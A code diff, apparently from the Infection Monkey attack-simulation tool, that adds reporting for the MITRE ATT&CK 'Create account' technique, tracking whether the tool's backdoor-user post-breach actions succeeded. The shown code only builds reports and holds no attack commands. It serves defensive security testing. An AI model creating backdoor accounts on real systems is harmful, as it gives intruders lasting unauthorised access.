techniques[key] = {'selected': technique['value'], 'type': SCHEMA['properties'][type_name]['title']}
return techniques

View File

@ -4,6 +4,7 @@ from monkey_island.cc.models import Monkey
from monkey_island.cc.services.attack.technique_reports import T1210, T1197, T1110, T1075, T1003, T1059, T1086, T1082
from monkey_island.cc.services.attack.technique_reports import T1145, T1105, T1065, T1035, T1129, T1106, T1107, T1188
from monkey_island.cc.services.attack.technique_reports import T1090, T1041, T1222, T1005, T1018, T1016, T1021, T1064
from monkey_island.cc.services.attack.technique_reports import T1136
from monkey_island.cc.services.attack.attack_config import AttackConfig
from monkey_island.cc.database import mongo
from monkey_island.cc.services.reporting.report_generation_synchronisation import safe_generate_attack_report
@ -35,7 +36,8 @@ TECHNIQUES = {'T1210': T1210.T1210,
'T1018': T1018.T1018,
'T1016': T1016.T1016,
'T1021': T1021.T1021,
'T1064': T1064.T1064
'T1064': T1064.T1064,
'T1136': T1136.T1136
}
REPORT_NAME = 'new_report'

View File

@ -66,6 +66,22 @@ SCHEMA = {
}
}
},
"persistence": {
"title": "Persistence",
"type": "object",
"link": "https://attack.mitre.org/tactics/TA0003/",
"properties": {
"T1136": {
"title": "Create account",
"type": "bool",
"value": True,
"necessary": False,
"link": "https://attack.mitre.org/techniques/T1136",
"description": "Adversaries with a sufficient level of access "
"may create a local system, domain, or cloud tenant account."
}
}
},
"defence_evasion": {
"title": "Defence evasion",
"type": "object",

View File

@ -0,0 +1,38 @@
from monkey_island.cc.services.attack.technique_reports import AttackTechnique
from monkey_island.cc.services.reporting.report import ReportService
from common.utils.attack_utils import ScanStatus
from common.data.post_breach_consts import POST_BREACH_BACKDOOR_USER, POST_BREACH_COMMUNICATE_AS_NEW_USER
__author__ = "shreyamalviya"
class T1136(AttackTechnique):
tech_id = "T1136"
unscanned_msg = "Monkey didn't try creating a new user on the network's systems."
scanned_msg = "Monkey tried creating a new user on the network's systems, but failed."
used_msg = "Monkey created a new user on the network's systems."
@staticmethod
def get_report_data():
data = {'title': T1136.technique_title()}
scanned_nodes = ReportService.get_scanned()
status = ScanStatus.UNSCANNED.value
for node in scanned_nodes:
if node['pba_results'] != 'None':
for pba in node['pba_results']:
if pba['name'] in [POST_BREACH_BACKDOOR_USER,
POST_BREACH_COMMUNICATE_AS_NEW_USER]:
status = ScanStatus.USED.value if pba['result'][1]\
else ScanStatus.SCANNED.value
data.update({
'info': [{
'machine': {
'hostname': pba['hostname'],
'ips': node['ip_addresses'],
},
'result': ': '.join([pba['name'], pba['result'][0]])
}]
})
data.update(T1136.get_base_data_by_status(status))
return data

Some files were not shown because too many files have changed in this diff Show More